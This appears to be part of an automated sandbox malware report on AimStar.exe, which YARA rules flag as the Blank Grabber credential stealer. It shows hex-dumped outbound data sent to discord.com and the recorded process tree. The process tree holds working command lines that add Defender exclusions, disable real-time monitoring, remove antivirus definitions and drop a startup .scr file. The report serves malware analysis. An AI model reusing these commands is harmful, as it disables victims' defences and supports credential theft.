2025-01-01 21:12:36 UTC	16384	OUT	Data Raw: 80 7a 93 8f 50 5c 77 1c 86 cf bd 3a 15 a0 ab a2 e8 c5 07 9b 91 3f b2 4b d8 ae 9d 57 4d 00 bd c6 d1 12 84 59 1a 3c 2e 6b ab 55 d0 13 6d 7c 48 eb be 6c 4c 58 65 a0 0e dc 8e 78 a7 2b b8 0e 7a 56 ff c7 1d b6 89 4d ae 49 c5 17 ba 13 46 f0 d9 5f 9b e2 64 5e f2 af 1b 7a 0f fc db b3 9c 24 a8 c9 64 35 d3 f9 69 49 94 11 8b a4 e5 bc 3d 35 c4 43 a0 b6 e1 16 8c 22 c6 8a 90 56 de 17 15 7d 01 8a 90 78 4f f3 19 84 cc 85 80 f1 64 cf b2 bc d9 66 1b 5b 25 3c c1 43 ad 10 55 68 4a 5f 41 10 70 10 b6 47 d6 f2 ab cf 54 d7 18 05 6a 4b 8e e3 6a b2 7e 78 30 c2 75 3e 31 48 74 5c 44 c5 de a4 46 8b 5a 9f 8b a8 0c b1 fa 5e e4 8e 32 63 41 23 4d 8b 66 f6 2b b0 19 0a 4a 18 fc 85 cb d9 f1 36 b0 e3 8b ea 2e fd 5c 4c 50 57 6e e7 96 22 9c 36 8c 09 bf 6a fc 73 c9 2c ee 7d ae 31 91 b2 53 49 1e Data Ascii: zP\w:?KWMY<.kUm\|HlLXex+zVMIF_d^z$d5iI=5C"V}xOdf[%<CUhJ_ApGTjKj~x0u>1Ht\DFZ^2cA#Mf+J6.\LPWn"6js,}1SI
2025-01-01 21:12:36 UTC	16384	OUT	Data Raw: 44 3b 7e e6 87 b9 35 dd 1d 7f c6 ec 29 da 73 76 2a cb a4 2d 1c 1b 41 df e1 15 f9 43 7f 05 9d 18 7b f6 c3 0e 9a 59 1a c6 f5 a2 cf c4 13 76 23 1b 87 35 d0 40 dd aa 5f bf fa 5b 38 3d 4f f6 09 38 cc e2 00 b9 ee ed b0 4f ea 2c 11 af da 34 d9 23 12 33 68 33 7d 40 69 0d a0 33 08 84 e3 fa 51 d9 fd 3a 54 02 70 18 33 b3 75 b5 51 2d 82 9c 4a 8b b9 b8 0e f5 e6 f0 3e 40 fc 16 c0 c9 e9 ae d8 95 05 1c cd cf 62 b9 db 63 59 55 67 5a 95 96 e6 ab 71 78 db a4 61 6b 28 71 d9 55 a1 fd 58 08 ae 98 99 c9 16 3d 44 48 e3 9d f0 d9 4e db f9 e0 e9 d9 4e d3 18 af 15 f3 56 07 17 05 ff 81 8e b7 f8 07 0d 8c 60 64 74 00 c0 16 88 b2 24 70 3f e5 91 e5 a3 34 dd c3 dc f4 3a c3 5a 91 d6 fd 13 f1 19 26 d9 2a 53 6b ff da cf cb ae b8 e2 39 53 84 77 ae aa 3c f0 48 e8 72 6a fc 59 c1 6e 58 32 2a 76 Data Ascii: D;~5)sv-AC{Yv#5@_[8=O8O,4#3h3}@i3Q:Tp3uQ-J>@bcYUgZqxak(qUX=DHNNV`dt$p?4:Z&Sk9Sw<HrjYnX2*v
2025-01-01 21:12:36 UTC	16384	OUT	Data Raw: 44 73 ba a5 d1 55 66 8e 36 b1 03 60 4d 0b 18 9e 28 ac e4 58 3e cd 29 26 85 f3 33 66 a0 46 7a 92 ea 32 7f 55 14 3a 8a 6a 99 4d ce c3 2f fe 53 3a eb a2 bc 57 b1 d1 25 da 4a 71 e9 75 ca 11 5c 23 ac 78 c8 7b 59 ac 84 a4 8f 5c f2 d0 0f 19 7b 1a a8 88 42 d0 fb aa 54 b4 3a bd e3 04 c8 2c 66 31 51 df a5 c9 90 ad 98 10 e2 1d e6 e4 04 b1 1b b6 7f b5 c7 1b 7d 1c fd e2 f3 5d 4b 3e 3f b9 83 07 fd 1c b6 01 5c 13 e3 42 dc 77 12 af 8e 09 52 44 73 85 da c8 37 64 5a d0 a8 0a 4f eb 35 a2 f2 7e 48 d5 51 68 7b 15 f1 17 e9 48 13 17 e1 e8 e2 00 96 33 9e 2b fb 38 eb d0 42 1c 1b 36 9e 2d 48 c7 fb d0 9f 51 a7 76 8f ab ab 43 91 9a dd 88 58 00 98 e1 78 9a f4 a8 9a 13 c8 24 90 45 7a d9 68 d4 cd 5d 9c 92 24 28 1e 9e 67 cc 4f a4 04 8c 23 b4 c7 41 1b 21 3f 6e 6a fa ef a5 e2 36 9e 01 73 Data Ascii: DsUf6`M(X>)&3fFz2U:jM/S:W%Jqu\#x{Y\{BT:,f1Q}]K>?\BwRDs7dZO5~HQh{H3+8B6-HQvCXx$Ezh]$(gO#A!?nj6s
2025-01-01 21:12:36 UTC	16384	OUT	Data Raw: a7 c2 14 12 5f 34 b6 e8 41 29 f9 37 29 1d fc 3b 2a f8 c3 07 50 2a f7 b7 88 de 0c e4 8d 5f 6e 84 79 db b1 00 a1 b4 fe 29 7e 36 19 be 04 24 48 56 4b 8f dc 9c 16 70 d3 f5 17 71 dd 18 c2 4c b0 29 39 65 e9 6d ac 48 ea 77 6e fa 50 47 59 9c 8e 77 01 59 79 22 e0 24 0f 3f 4a 23 7a ae 1e 3d da 3c b9 21 3e fa 02 b4 14 54 20 ec af 41 81 95 58 02 28 04 20 39 f2 4a 34 4e 48 ab 7e ca 96 d7 52 df 1a a5 d2 d2 0b da 46 03 83 90 72 b8 11 87 41 4c 40 08 58 fb 31 f3 a1 8c 26 49 49 62 dd aa 11 21 0d 9e 7f 87 3d b9 0a 51 cd 39 1b 47 bc 36 bd b7 95 d8 a9 a8 1e f7 4e b3 b8 a3 9a ab 5c ad 5e 30 d0 e6 45 46 81 78 cf ae a6 28 e9 ff b2 2c 18 33 27 1e 48 4a a3 56 6c 66 7e 03 e9 60 22 73 38 f0 fd fe 4f 65 cc 7f dd 07 61 46 96 16 24 c3 6b 72 12 2d 62 d3 15 22 df 12 f6 b5 a3 f1 0f 55 2a Data Ascii: _4A)7);P_ny)~6$HVKpqL)9emHwnPGYwYy"$?J#z=<!>T AX( 9J4NH~RFrAL@X1&IIb!=Q9G6N\^0EFx(,3'HJVlf~`"s8OeaF$kr-b"U*
2025-01-01 21:12:36 UTC	16384	OUT	Data Raw: 55 8b b5 04 7d aa 50 5c f6 a8 f3 5b 7d f7 07 27 f1 55 f3 cb 15 22 f0 06 22 8b cb fc 16 7a fd 1d 0b a0 90 48 28 aa b9 b6 3b a5 87 12 cc ec 2f 43 77 84 ac ac 28 6d ca ee f5 f4 a2 2b d9 39 37 e0 64 25 83 20 3c d6 a3 0a 5e c7 d7 1b f0 bc 90 ec 0d 80 59 c3 3d 26 16 98 2a e3 23 93 9e 6d 94 ed 00 c5 e9 8f cd d0 86 86 c9 4a 50 a5 d7 31 bb f9 22 dc 06 54 dc 2d 27 92 3e 24 a8 e3 96 3b 51 98 cb 23 52 a7 d2 fd be f2 53 39 d9 4e df 7a af bf fd da d8 0a a3 59 90 5b a3 53 40 4c 3b a2 a2 23 35 21 1c 48 33 d1 b3 c7 43 94 ce 0e e8 7a 69 f4 ed 17 64 11 82 75 4b aa 72 94 a1 4e a4 b3 92 5a 5e 64 3b 03 cd 15 37 ae c0 94 fb 6e af 84 b6 fd 8f 36 64 b2 ea a8 89 d4 b2 0d 0a e4 e7 64 60 f4 3c 32 9d b7 e8 b1 45 57 ca 5d eb e9 06 aa 7a 19 ab bf f6 7f 15 d8 43 a1 66 c0 2c 42 d9 6d a3 Data Ascii: U}P\[}'U""zH(;/Cw(m+97d% <^Y=&*#mJP1"T-'>$;Q#RS9NzY[S@L;#5!H3CziduKrNZ^d;7n6dd`<2EW]zCf,Bm
2025-01-01 21:12:36 UTC	16384	OUT	Data Raw: 1d f9 b1 7f 47 8d c1 db be 55 fe b0 a8 f6 79 a7 ec 0e 7e e6 92 dc 75 80 0e f1 e4 fd 48 3f 86 3a 56 3d a9 6e f6 2f f1 3a e9 19 89 bc be 41 bd a7 54 73 89 a0 6c d2 fb 31 55 ee e6 be 18 96 90 d6 75 94 4a 5d 8c d6 c4 8e e5 54 84 32 f6 45 23 21 2c 4b 6d ba 4d dc 96 7a 25 a6 b1 c2 9b 41 12 b1 2c 12 dd b3 a5 70 cf 49 ae ee 20 47 3c ca 51 81 1d d9 6d b1 65 10 02 c2 71 b6 e0 69 6f 0e 51 9e 5f 0f 22 57 18 b1 26 c4 03 75 33 31 97 50 b5 f1 18 ab d1 5f 82 c0 1e fa 01 be 18 cf 31 23 15 70 6d 78 f2 6a 77 10 38 41 e5 b1 a0 2f f9 1d db 62 3d ad 1d 28 fa 54 c6 82 86 21 d2 2f 69 1e 05 a7 14 4b fe b4 06 e3 92 90 a8 31 bd 32 33 d5 95 29 38 92 f1 2d ca 5c 82 cb 1e d7 db c7 f1 04 4e 4c e6 06 7d e1 02 b1 df f8 18 8c c5 5f b6 1e c3 c3 1f f0 58 24 d9 68 de 61 4a 96 ba 5c 28 91 35 Data Ascii: GUy~uH?:V=n/:ATsl1UuJ]T2E#!,KmMz%A,pI G<QmeqioQ_"W&u31P_1#pmxjw8A/b=(T!/iK123)8-\NL}_X$haJ\(5
2025-01-01 21:12:36 UTC	16384	OUT	Data Raw: 0e a8 6a 71 2e 4b a9 d9 94 49 cb 8e 86 87 98 e7 78 30 32 9e 3d 4e 2c 65 9c 4e 3b 7c 25 a7 55 75 be 71 ad 20 37 f3 41 78 81 df 16 6e 40 7f 81 39 a7 4f ce da b6 a6 87 d2 3e e7 25 66 1e f0 3f 89 30 07 c3 81 48 71 f8 13 05 7b 2f ca 39 9d 4f 5c 28 30 49 3c 32 3f 50 64 8b 3e 4b 00 f0 f7 13 2f b5 86 94 93 e3 12 35 a9 4a ab af 2f f9 36 d8 bc 3e 91 a8 3b a0 db f4 a3 29 09 db 0d 0b 27 cd 25 fa 45 c7 38 47 6e c9 0b 3b 1e 29 15 6d 2c 27 ef 13 89 9f e7 38 f5 49 7b b2 04 4e 4c 28 b0 e0 59 9e 54 56 9c 49 b3 e4 c2 58 c8 5a 2b 99 a1 a1 e0 4f 06 9d 80 b3 e2 26 db 39 90 01 9b 25 c4 11 54 0c 6c 8d 7c 3c f9 85 40 e2 a8 62 38 e8 3c 8b 2d e2 0e 75 4e 3d 45 1e d3 50 9b 55 4e cd 91 1a 31 2d bc 24 c5 fb 1d fe ba aa 4e c3 28 b1 f6 5b 54 6f e2 f4 33 be ba f2 0e 5d 68 36 17 8b 29 21 Data Ascii: jq.KIx02=N,eN;\|%Uuq 7Axn@9O>%f?0Hq{/9O\(0I<2?Pd>K/5J/6>;)'%E8Gn;)m,'8I{NL(YTVIXZ+O&9%Tl\|<@b8<-uN=EPUN1-$N([To3]h6)!
2025-01-01 21:12:36 UTC	16384	OUT	Data Raw: a0 74 40 40 2c d8 38 a3 8c 17 a6 1d 29 a4 f3 4d 2c ad 06 ca 35 c3 17 55 be cf c3 9b 50 5b fc 3b 3e ee 38 4b 77 2c 7a b1 71 5c 04 62 1e fe 92 ac a4 54 17 5e 55 4d 93 c3 b0 39 97 02 71 b2 b0 f4 97 bb e5 0c e5 7a ab c2 28 84 a5 ee b8 2a 77 b4 32 37 a1 9a 58 4e 06 ca 47 69 60 35 78 c5 7e d7 0e 8d 35 a4 8a 8f 92 2b 4f 31 b6 0c a3 87 31 81 8c 6f 8e e8 78 39 a0 22 0a 4e c2 e5 11 26 eb db 05 6d 08 57 87 87 27 b1 b8 4b 56 ae e3 3f 92 f3 e2 c2 54 2f 57 85 82 c5 9c d7 01 b6 28 68 1b eb 5e d3 59 b7 f1 cf 9b fc 80 d0 d0 36 40 94 94 60 5e 37 0d 86 62 9b 27 62 a7 24 e9 49 be ed 59 f5 46 13 38 7b a7 e3 1b b2 52 84 e5 49 58 4c ec 20 21 f3 c9 a2 79 7e e6 52 f0 0f 2d 6b 0f 0b df e3 fd 77 c8 00 00 7d 10 81 98 c9 f7 aa b6 1e 12 9f f7 76 71 b4 33 89 00 c5 1c cb ae 2f 5b 11 c3 Data Ascii: t@@,8)M,5UP[;>8Kw,zq\bT^UM9qz(*w27XNGi`5x~5+O11ox9"N&mW'KV?T/W(h^Y6@`^7b'b$IYF8{RIXL !y~R-kw}vq3/[
2025-01-01 21:12:36 UTC	16384	OUT	Data Raw: eb b8 d6 42 5e f3 e1 7d 31 90 b6 e3 45 3e 3b 04 23 8f 85 b8 f7 3a d9 ee 1f 4b 65 15 a2 05 3c bc 8d b4 ea 92 fa 91 27 2f f2 a2 a1 56 0b 1f 6a 68 84 08 e1 8b 09 fc 5d 98 31 af 3f 2d 01 51 04 bf c0 68 5b cf 0d 51 88 4b 93 31 c9 7b 3c 82 a2 49 30 cd 35 ef ba ea 77 97 cd cd 09 c4 d5 84 e4 22 9a f1 89 00 1a 18 be 9b f9 f5 2f ad ef 22 f8 67 91 11 2d 00 ac 12 91 53 ba 84 6e 22 05 7b de bc 18 a8 66 c8 18 e1 8c 68 9f 7c c1 1a ae 32 de f3 04 b7 5e 62 74 34 8b 34 bd fa 00 8e 6c 6b 2f 79 d5 86 1b e6 b4 85 d0 1f 3e f0 fb ef 81 01 d6 0e 5b 8b 40 a7 51 d5 e5 8a 89 03 eb 33 b2 94 57 b5 43 4f cd d0 f6 3a 35 2a 93 b3 0b e5 51 0b e4 6e cc 5a 0d 4e 76 22 eb ab 3a 94 d3 86 6a 42 6f 51 e7 58 32 fa cf d1 ae cd b7 8e f7 09 b4 f3 c2 9a a1 98 ba 4b 17 e7 d1 2e 0d f4 12 f6 68 77 25 Data Ascii: B^}1E>;#:Ke<'/Vjh]1?-Qh[QK1{<I05w"/"g-Sn"{fh\|2^bt44lk/y>[@Q3WCO:5*QnZNv":jBoQX2K.hw%
2025-01-01 21:12:36 UTC	1255	IN	HTTP/1.1 404 Not Found Date: Wed, 01 Jan 2025 21:12:36 GMT Content-Type: application/json Content-Length: 45 Connection: close Cache-Control: public, max-age=3600, s-maxage=3600 strict-transport-security: max-age=31536000; includeSubDomains; preload x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f x-ratelimit-limit: 5 x-ratelimit-remaining: 4 x-ratelimit-reset: 1735765958 x-ratelimit-reset-after: 1 via: 1.1 google alt-svc: h3=":443"; ma=86400 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BhGPHmf2CkQpxNJKrU3FALioK3d3Ezz5k2Wlz3Gfy8iHMBtU9bCd4dyhhw7icRi4woK8y%2F9mPBpUzTjNLSNTRAg9mhGkdZpOuJlrCyBMoMlGIciOTqFl0%2Bu62jFi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Set-Cookie: __cfruid=a3e5254bb13bbfd0eab3271a2cd309bfca598747-1735765956; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Content-Security-Policy: frame-ancestors 'none'; default-src 'none' Set-Cookie: _cfuvid=aOFeXPXGF_hja_MGT_l13.d1SgVHLQwWi5_dvT69AJo-1735765956727-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None Server: cloudflare CF-RAY: 8fb5822a1b5f32d3-EWR

Target ID:	0
Start time:	16:11:57
Start date:	01/01/2025
Path:	C:\Users\user\Desktop\AimStar.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\AimStar.exe"
Imagebase:	0x7ff710f40000
File size:	8'116'372 bytes
MD5 hash:	9E5A9429BC193EE14EBC1F87201BE518
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.2021999995.00000192BB8F5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000003.2021999995.00000192BB8F3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	16:11:57
Start date:	01/01/2025
Path:	C:\Users\user\Desktop\AimStar.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\AimStar.exe"
Imagebase:	0x7ff710f40000
File size:	8'116'372 bytes
MD5 hash:	9E5A9429BC193EE14EBC1F87201BE518
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	16:12:01
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe'"
Imagebase:	0x7ff6fc730000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	16:12:01
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Imagebase:	0x7ff6fc730000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	16:12:01
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	16:12:01
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
Imagebase:	0x7ff6fc730000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	16:12:01
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	16:12:01
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	16:12:01
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Imagebase:	0x7ff6fc730000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	16:12:01
Start date:	01/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe'
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	16:12:01
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	16:12:01
Start date:	01/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	16:12:01
Start date:	01/01/2025
Path:	C:\Windows\System32\tasklist.exe
Wow64 process (32bit):	false
Commandline:	tasklist /FO LIST
Imagebase:	0x7ff63d290000
File size:	106'496 bytes
MD5 hash:	D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	16:12:01
Start date:	01/01/2025
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic csproduct get uuid
Imagebase:	0x7ff6ab520000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	16:12:03
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
Imagebase:	0x7ff6fc730000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	16:12:04
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	16:12:04
Start date:	01/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Imagebase:	0x7ff7be200000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	16:12:04
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
Imagebase:	0x7ff6fc730000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	16:12:04
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	16:12:04
Start date:	01/01/2025
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Imagebase:	0x7ff7be200000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	16:12:05
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase:	0x7ff6fc730000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	16:12:05
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	16:12:05
Start date:	01/01/2025
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff6ab520000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	16:12:06
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase:	0x7ff6fc730000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 8180, Parent PID: 8168

General

Target ID:	26
Start time:	16:12:06
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	16:12:06
Start date:	01/01/2025
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff6ab520000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	16:12:07
Start date:	01/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'"
Imagebase:	0x7ff6fc730000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	16:12:07
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	16:12:07
Start date:	01/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'
